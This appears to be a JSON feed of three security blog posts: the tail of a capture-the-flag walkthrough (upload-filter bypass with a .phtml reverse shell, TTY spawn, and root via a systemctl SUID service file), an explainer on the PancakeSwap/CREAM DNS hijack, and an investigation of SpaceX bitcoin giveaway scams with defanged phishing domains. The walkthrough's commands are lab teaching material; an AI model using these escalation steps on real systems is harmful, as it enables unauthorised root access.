768w, https://blog.syncpundit.io/media/posts/3/responsive/clear-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/clear-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/clear-2xl.png 1600w\" alt=\"clear positions\" width=\"279\" height=\"318\" data-is-external-image=\"true\"></figure></figure>\nHighlight the filename and add the position\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/filename.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/filename-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/filename-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/filename-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/filename-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/filename-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/filename-2xl.png 1600w\" alt=\"highligh new position\" width=\"282\" height=\"110\" data-is-external-image=\"true\"></figure></figure>\n<p>Head over to the payload section and add some extensions to the simple list payload option. We'll be trying</p>\n<ul>\n<li>html</li>\n<li>php1</li>\n<li>php2</li>\n<li>php5</li>\n<li>phtml</li>\n</ul>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/payload-list.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/payload-list-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-2xl.png 1600w\" alt=\"payload list\" width=\"583\" height=\"316\" data-is-external-image=\"true\"></figure></figure>\n<p>Finally disable URL-encode and start the attack! Results from the intruder always look identical, so we search for the one that's different from the rest. If it exists, it's our winner!</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/compromise.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/compromise-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-2xl.png 1600w\" alt=\"access gained\" width=\"682\" height=\"247\" data-is-external-image=\"true\"></figure></figure>\n<p>\".phtml\" seems to have worked. Lets navigate to the \"/uploads/\" directory to confirm</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/we-in.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/we-in-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-2xl.png 1600w\" alt=\"proof of compromise\" width=\"484\" height=\"231\" data-is-external-image=\"true\"></figure></figure>\nNow that we have proof of compromise we can go ahead and execute the reverse shell by opening it in the browser.\n<p> </p>\n<h2>INITIAL ACCESS</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/initial-access.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/initial-access-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-2xl.png 1600w\" alt=\"initial access\" width=\"1440\" height=\"207\" data-is-external-image=\"true\"></figure></figure>\n<p>We're in! We do some basic prying to see who we are in the system, who are the other users and what are their privileges?</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/user-flag.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/user-flag-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-2xl.png 1600w\" alt=\"user flag\" width=\"728\" height=\"262\" data-is-external-image=\"true\"></figure></figure>\n<p>And we have our user flag! With that let's checkout some SUID binaries. </p>\n<h2>PRIVILEGE ESCALATION</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/suid.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/suid-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/suid-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/suid-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/suid-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/suid-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/suid-2xl.png 1600w\" alt=\"SUID\" width=\"661\" height=\"678\" data-is-external-image=\"true\"></figure></figure>\n<p>We have a bunch of interesting stuff to use to our advantage but first lets spawn a TTY shell to get rid of some restrictions.</p>\n<blockquote>\n<p>python -c 'import pty; pty.spawn(\"/bin/bash\")'</p>\n</blockquote>\n<p>In case you were wondering, i haven't memorised all these commands yet. I use <a href=\"https://github.com/LasCC/Hack-Tools\" target=\"_blank\" rel=\"noopener noreferrer\">Hack Tools</a>, check them out and buy them a coffee! Remember one of the binaries we found was </p>\n<blockquote>\n<p>/bin/systemctl</p>\n</blockquote>\n<p>It's especially interesting because systemctl controls service managers. This means that we can mess around with <strong>/etc/system/systemd. </strong>I'll navigate to the /opt directory and we'll create some environment variables from there.</p>\n<blockquote>\n<p>priv=$(mktemp).service</p>\n</blockquote>\n<p>Next we attach a unit file to our environment variable</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/service.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/service-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/service-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/service-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/service-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/service-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/service-2xl.png 1600w\" alt=\"service\" width=\"742\" height=\"184\" data-is-external-image=\"true\"></figure></figure>\n<p>With that we just created a simple service that executes the \"cat\" command on the root flag and writes it in the /opt directory we're in. Since the user flag was in a file called user.txt, my bet is that the root flag is called root.txt. When the service runs successfully the flag should be saved as \"root-flag\" in the /opt directory.</p>\n<p>Let's run the unit file using /bin/systemctl</p>\n<blockquote>\n<p>/bin/systemctl link $priv</p>\n<p>/bin/systemctl enable --now $priv</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/root-flag.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/root-flag-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-2xl.png 1600w\" alt=\"root flag\" width=\"1446\" height=\"182\" data-is-external-image=\"true\"></figure></figure>\n<p>And with that you can run whatever command with root privileges as a service. RPaaS🤓. Happy hacking!</p>\n</div>",
"image": "https://blog.syncpundit.io/media/posts/3/vulversity.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Walkthroughs"
],
"date_published": "2021-07-23T23:37:00+02:00",
"date_modified": "2021-09-20T19:26:12+02:00"
},
{
"id": "https://blog.syncpundit.io/pancakeswap-and-cream-finance-dns-attack/",
"url": "https://blog.syncpundit.io/pancakeswap-and-cream-finance-dns-attack/",
"title": "PancakeSwap and CREAM Finance DNS Attack",
"summary": "A few hours ago CREAM Finance released a tweet warning their users NOT TO ENTER any seed phrases on their site as their…",
"content_html": "<p><span style=\"font-weight: 400;\">A few hours ago CREAM Finance released </span><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\"></a><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\" target=\"_blank\" rel=\"noopener noreferrer\"></a><span style=\"color: #3598db;\"><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">a tweet</a></span><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\" target=\"_blank\" rel=\"noopener noreferrer\"></a><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\" target=\"_blank\" rel=\"noopener noreferrer\"></a><span style=\"font-weight: 400;\"> warning their users NOT TO ENTER any seed phrases on their site as their DNS has been compromised.</span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/2//pan.png\" alt=\"cream tweet\" width=\"601\" height=\"371\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/2//responsive/pan-xs.png 300w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-sm.png 480w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-md.png 768w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-lg.png 1024w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-xl.png 1360w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-2xl.png 1600w\"></figure>\n<p><span style=\"font-weight: 400;\">A little over an hour later PancakeSwap released </span><a href=\"https://twitter.com/PancakeSwap/status/1371470368058183687\"><span style=\"font-weight: 400;\"><span style=\"color: #3598db;\">a tweet</span></span></a><a href=\"https://twitter.com/PancakeSwap/status/1371470368058183687\"></a><span style=\"font-weight: 400;\"> as well warning their users not to use their site as well. Stating that they suspect a similar attack like the one on CREAM, and they followed up with a </span><span style=\"color: #3598db;\"><a href=\"https://twitter.com/PancakeSwap/status/1371471934999777281\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">confirmation</span></a></span><span style=\"font-weight: 400;\"> a few minutes later.</span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/2//pan1.png\" alt=\"pancakeswap tweet\" width=\"597\" height=\"807\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/2//responsive/pan1-xs.png 300w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-sm.png 480w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-md.png 768w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-lg.png 1024w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-xl.png 1360w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-2xl.png 1600w\"></figure>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">What is DNS?</span></h1>\n<p><span style=\"font-weight: 400;\">DNS is perhaps one of the most important pillars of the internet. It’s the system that maps domain names to their corresponding IP addresses amongst other things. Basically the internet’s address book. When you visit google.com two things are expected to happen:</span></p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">You expect to see that search bar</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Your computer expects the IP address of the servers that are hosting google.com so that it can show you said search bar</span></li>\n</ol>\n<p><span style=\"font-weight: 400;\">This is where DNS comes in, to mediate amongst you, your computer and google.com. You need to see google.com but you don’t know its IP address, your computer wants to give you google.com but it needs to know its IP address and finally, the servers at google.com are open to serving anyone the contents of google.com but they need to know to which IP address to send that nice search bar to. DNS is the universal translater that helps your computer find out which IP address it needs to contact to get a hold of google.com, after which it finally delivers the crisp google.com to your browser.</span></p>\n<p><span style=\"font-weight: 400;\">From google.com’s perspective. DNS has records that help computers find the information they need to communicate with google.com. Those records point any computer searching for google.com to the correct server(s) hosting and serving the contents of google.com. </span></p>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">What is a DNS attack?</span></h1>\n<p><span style=\"font-weight: 400;\">Simply put, It’s an attack that involves malicious actors manipulating the mapping process between domains and IP addresses. In the case of CREAM Finance and PancakeSwap. The attackers got a hold of the companies’ DNS infrastructure and changed the destination IP addresses of the cream.finance and pancakeswap.finance to the attackers’ IP addresses that are hosting phishing pages. So right now anyone who visits cream.finance and pancakeswap.finance is being routed to fake versions of the sites and are being solicited for seed phrases which should </span><span style=\"color: #e03e2d;\"><strong>NEVER BE GIVEN TO ANYONE!</strong><span style=\"font-weight: 400;\"> </span></span></p>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">How to protect your website from DNS hijacking?</span></h1>\n<p><span style=\"font-weight: 400;\">If you have a website your DNS is most likely managed through your domain’s registrar. The best way to protect your DNS from attacks is to guard access to the registrar accounts. Follow your standard operational security practices - use strong unique passwords, 2FA, VPN, check haveibeenpwned.com etc. </span></p>\n<p><span style=\"font-weight: 400;\">Take good care of your DNS records and settings. Make sure things like zone transfers from external IP addresses are disabled. Also, make sure you have </span><a href=\"https://dmarcian.com/what-is-dkim/\"><span style=\"font-weight: 400;\">DKIM</span></a><span style=\"font-weight: 400;\">, </span><a href=\"https://dmarcian.com/what-is-spf/\"><span style=\"font-weight: 400;\">SPF</span></a><span style=\"font-weight: 400;\">, </span><a href=\"https://dmarcian.com/why-dmarc/\"><span style=\"font-weight: 400;\">DMARC</span></a><span style=\"font-weight: 400;\"> and</span> <a href=\"https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en\"><span style=\"font-weight: 400;\">DNSSEC</span></a><span style=\"font-weight: 400;\"> set up and properly configured. Ultimately, having an action plan is useful in the event that something goes wrong, including how you will inform users of the attack.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/2/pan2.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2021-03-15T22:50:00+02:00",
"date_modified": "2021-09-20T20:00:34+02:00"
},
{
"id": "https://blog.syncpundit.io/spacex-bitcoin-giveaway/",
"url": "https://blog.syncpundit.io/spacex-bitcoin-giveaway/",
"title": "SpaceX Bitcoin Giveaway?",
"summary": "On Saturday 13 June, Spacex successfully launched their ninth Starlink mission. Just 24 hours later, a total of nearly 9 BTC (almost USD…",
"content_html": "<p><span style=\"font-weight: 400;\">On Saturday 13 June, Spacex successfully </span><span style=\"color: #3598db;\"><a href=\"https://www.spacex.com/launches/\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">launched their ninth Starlink mission</span></a></span><span style=\"font-weight: 400;\">. </span><span style=\"font-weight: 400;\">Just 24 hours later, a total of nearly 9 BTC (almost USD 84 000 at the time of writing this) was lost to a SpaceX bitcoin giveaway scam. Yes, a SpaceX, bitcoin, giveaway.</span></p>\n<h1> </h1>\n<h1><span style=\"font-weight: 400;\">Brief History</span></h1>\n<p><span style=\"font-weight: 400;\">In November 2018, the Independent </span><span style=\"color: #3598db;\"><a href=\"https://www.independent.co.uk/life-style/gadgets-and-tech/news/elon-musk-bitcoin-scam-twitter-hackers-cryptocurrency-a8620436.html\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">published an article</span></a></span><span style=\"font-weight: 400;\"> about a wave of phishing attacks that swindled people of thousands of dollars in bitcoin. The attackers had hijacked a few twitter accounts with high followings, changed them to emulate Elon Musk, CEO of SpaceX and Tesla, and launched a fake giveaway campaign. For a while the scams ceased until they reappeared recently.</span></p>\n<p><span style=\"font-weight: 400;\">Several weeks ago, I received a report of a phishing attack hosted at spacex[.]money. </span><span style=\"font-weight: 400;\">I began looking into this and during the investigation I discovered a horde of additional domains set up by the attackers, including:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-tesla[.]me</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex[.]money</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]net</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]infoSpacex-btc[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]live</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spaceufx[.]site</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">btcspacex[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">officialelonmusk[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">elonmusckbtc[.]com</span></li>\n</ul>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">The Second Wave</span></h1>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed.png\" alt=\"\" width=\"1600\" height=\"1425\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2xl.png 1600w\">\n<figcaption >Caption<span style=\"font-weight: 400;\">Photo credits: </span><a href=\"https://news.bitcoin.com/spacex-bitcoin-scam-btc-giveaway-elon-musk-nasa-launch/\"><span style=\"font-weight: 400;\">https://news.bitcoin.com/spacex-bitcoin-scam-btc-giveaway-elon-musk-nasa-launch/</span></a></figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The second wave of attacks were fundamentally similar to the first wave - </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/most-common-social-media-phishing-attacks\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">hijacked accounts</span></a></span><span style=\"font-weight: 400;\"> with high followings and fake giveaway campaigns. Only this time they leveraged YouTube and the muse was not just Elon Musk, but SpaceX too. The first collection of these YouTube channels streamed a live feed of Elon Musk being interviewed for a SpaceX convention. The second bunch were no longer streaming live, but still used interviews of Elon Musk to trick people into giving them their hard-earned assets.</span></p>\n<figure class=\"post__image\"><img src=\"file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//unnamed-1.png\" alt=\"\" width=\"1202\" height=\"783\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-xs.png 300w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-sm.png 480w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-md.png 768w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-lg.png 1024w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-xl.png 1360w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-1-2xl.png 1600w\"></figure><figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-1-2.png\" alt=\"\" width=\"1202\" height=\"783\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-2xl.png 1600w\"></figure><figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-1.png\" alt=\"\" width=\"1202\" height=\"783\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2xl.png 1600w\"></figure>\n<p><span style=\"font-weight: 400;\">This is an example of one of the attacks live on YouTube. The phishing sites could be found in the videos’ descriptions. The sites follow a typical </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/staying-safe-online\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">trust trading</span></a></span><span style=\"font-weight: 400;\"> format, </span><span style=\"font-weight: 400;\">where victims are encouraged to \" send X amount of bitcoin with the promise of receiving 2X back”</span><span style=\"font-weight: 400;\">.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-2.png\" alt=\"\" width=\"1600\" height=\"772\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-2xl.png 1600w\">\n<figcaption >Capti<a href=\"https://spacex-btc.info/\"><span style=\"font-weight: 400;\">https://spacex-btc.info/#</span></a>on</figcaption>\n</figure>\n<p> </p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-3-2.png\" alt=\"\" width=\"1600\" height=\"769\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-2xl.png 1600w\">\n<figcaption ><a href=\"https://spacex-btc.net/\"><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span></a>Caption</figcaption>\n</figure>\n<p> </p>\n<p><span style=\"font-weight: 400;\">The particular phishing site above was setup with this bitcoin address: </span><span style=\"color: #3598db;\"><a href=\"https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP</span></a></span></p>\n<p><span style=\"font-weight: 400;\">As of Sunday the 14</span><span style=\"font-weight: 400;\">th</span><span style=\"font-weight: 400;\"> of June, this scam had made a total of </span><span style=\"font-weight: 400;\">8.98024788 BTC </span><span style=\"font-weight: 400;\">from only 14 transactions.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-4.png\" alt=\"\" width=\"1565\" height=\"544\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP</span>Caption</figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">As can be expected, none of the bitcoin sent were reimbursed as the scam had claimed. They managed to make this much money all in one night, but how?</span></p>\n<h2><span style=\"font-weight: 400;\">Following the money</span></h2>\n<p><span style=\"font-weight: 400;\">I will take a look at one of the addresses and trace where the money went.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-5.png\" alt=\"\" width=\"701\" height=\"535\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-2xl.png 1600w\">\n<figcaption >Caption<span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></figcaption>\n</figure>\n<p> </p>\n<h3> </h3>\n<h3><span style=\"font-weight: 400;\">Following one of the branches</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-6.png\" alt=\"\" width=\"581\" height=\"624\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-2xl.png 1600w\">\n<figcaption >BranchCaption</figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">Just from this branch the money was bounced through two addresses before it was spent. On overall the branch looks like this:</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-7.png\" alt=\"\" width=\"1011\" height=\"491\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-2xl.png 1600w\">\n<figcaption >CaptiBird's eye viewon</figcaption>\n</figure>\n<p> </p>\n<p><span style=\"font-weight: 400;\">Some people were victims of multiple attacks. </span></p>\n<figure class=\"post__image\"><img src=\"file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//unnamed-8.png\" alt=\"\" width=\"960\" height=\"413\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-xs.png 300w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-sm.png 480w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-md.png 768w ,file:///home/notorious/Documents/Publii/sites/sync_pundit/input/media/posts/2//responsive/unnamed-8-lg.png 1024w 